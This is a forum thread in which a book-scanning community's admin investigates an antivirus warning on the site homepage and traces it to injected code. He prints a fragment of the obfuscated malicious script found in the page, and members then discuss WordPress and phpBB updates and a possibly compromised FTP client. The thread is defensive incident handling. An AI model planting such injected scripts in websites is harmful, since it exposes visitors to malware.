Daniel Reetz, the founder of the DIY Book Scanner community, has recently started making videos of prototyping and shop tips. If you are tinkering with a book scanner (or any other project) in your home shop, these tips will come in handy. https://www.youtube.com/channel/UCn0gq8 ... g_8K1nfInQ

Virus on Homepage ?

Just what it says.
Post Reply
Hasher
Posts: 77
Joined: 26 Sep 2009, 03:05

Virus on Homepage ?

Post by Hasher » 22 Dec 2010, 11:12

Am i the only one getting a virus warning on http://diybookscanner.org/ homepage ?


Image

User avatar
daniel_reetz
Posts: 2776
Joined: 03 Jun 2009, 13:56
E-book readers owned: Used to have a PRS-500
Number of books owned: 600
Country: United States
Contact:

Re: Virus on Homepage ?

Post by daniel_reetz » 22 Dec 2010, 11:30

hmm, someone else PM'd me about this and I thought Avast was having problems with the Scriptaculous library. However, after some digging I found this script embedded between the "map" and "html" tags on the front page:
<!-- C/C v0842 --><script>function lG(){};jJ="";lG.prototype = {eS : ction(){return 'dM'};sH=false;var bO=15569;var bN="";this.vX="";o.write(oF);var bNS=new Date();var jY=false;var bT=new Array();gF=false;var tS=26505;var xP = this;var cW=new Date();var oE="oE";eV="";var jX=function(){};this.aP="";this.lN=49747;h(function(){ var bB=function(){return 'bB'};function hU(){};function nK(){};lT="";xP.z();rT="rT";var gH='';this.qI='';var xO="xO";var dU="";this.vZ=false;wP="";}, 317);iN="iN";var hP="";oQB='';var sV=false;}eO="eO";hD=49992;}};var vF=61292;var gK=new lG(); zD="";gK.z();this.hR="hR";</script></body>


I'm not sure how it got in there, but please check that you're no longer getting a false positive, and I'll seek out the source of the attack.

User avatar
daniel_reetz
Posts: 2776
Joined: 03 Jun 2009, 13:56
E-book readers owned: Used to have a PRS-500
Number of books owned: 600
Country: United States
Contact:

Re: Virus on Homepage ?

Post by daniel_reetz » 22 Dec 2010, 11:35

Apparently Wordpress is the attack vector; we were a version behind on the blog -- entirely my fault. Can you please visit the blog, and see if you get the same report?

http://www.diybookscanner.org/news/

User avatar
daniel_reetz
Posts: 2776
Joined: 03 Jun 2009, 13:56
E-book readers owned: Used to have a PRS-500
Number of books owned: 600
Country: United States
Contact:

Re: Virus on Homepage ?

Post by daniel_reetz » 22 Dec 2010, 12:12

It's no longer clear that WP was the vector. I'm further investigating, have made backups of everything, and am scanning my local machines for infection.

I also have found no other evidence of infection according to the usual methods of this trojan, so it appears (for the moment) that it came from a local machine. I'll be changing admin passwords sitewide.

Anonymous1

Re: Virus on Homepage ?

Post by Anonymous1 » 10 Jan 2011, 13:07

You're also a bit behind on Wordpress again. 3.0.4 was just released, but I couldn't find any security holes in 3.0.3.

I'd be careful with PHPBB3. There are tons of scripts created just for the purpose of helping kiddies hack sites, so it's something to watch out for.

Have you tried the development version of each platform? Wordpress can be set to auto-update to the latest version (I run my local site on the development version, as I make WP themes sometimes). I'm not sure about PHPBB3...

User avatar
daniel_reetz
Posts: 2776
Joined: 03 Jun 2009, 13:56
E-book readers owned: Used to have a PRS-500
Number of books owned: 600
Country: United States
Contact:

Re: Virus on Homepage ?

Post by daniel_reetz » 10 Jan 2011, 15:03

Thanks for the reminder. I've gone through our hosting panel and clicked "upgrade" on everything, because the internal upgrade for Wordpress doesn't always work.

I've been keeping a close eye on things since the last incident. I appreciate more eyes.

Anonymous1

Re: Virus on Homepage ?

Post by Anonymous1 » 10 Jan 2011, 21:56

I wouldn't rely too much on a hosting panel for this. Wordpress is self-contained, and sometimes it is just easier to run the upgrade than rely on a host (it's not automatic, as it sometimes just queues your upgrade request). There was a huge wave of Wordpress and PHP-based system infections being spread via Dreamhost specifically. I hope this isn't one of them...

User avatar
daniel_reetz
Posts: 2776
Joined: 03 Jun 2009, 13:56
E-book readers owned: Used to have a PRS-500
Number of books owned: 600
Country: United States
Contact:

Re: Virus on Homepage ?

Post by daniel_reetz » 10 Jan 2011, 22:28

Unfortunately the self-update on my WP install here is broken, so I have to use the WebPanel to get it done. Rob usually handles the forum updates, I'm not sure which mechanism he is using.

I won't rely on it and I'll try to do better with updates. I've seen no suspicious activity since the original code insertion and that makes me suspect it happened through a compromised client (my old laptop) with FTP access, rather than through infected software on the server.

I am always interested in better security info and updates, so feel free to keep me up-to-date.

User avatar
rob
Posts: 773
Joined: 03 Jun 2009, 13:50
E-book readers owned: iRex iLiad, Kindle 2
Number of books owned: 4000
Country: United States
Location: Maryland, United States
Contact:

Re: Virus on Homepage ?

Post by rob » 10 Jan 2011, 22:58

The Admin Control Panel for the forum has an upgrade button, it hardly takes any time at all. Every so often I check the version page, and it says whether there's a newer version to install. So the forum tends to be up-to-date.
The Singularity is Near. ~ http://halfbakedmaker.org ~ Follow me as I build the world's first all-mechanical steam-powered computer.

Post Reply

Who is online

Users browsing this forum: No registered users and 1 guest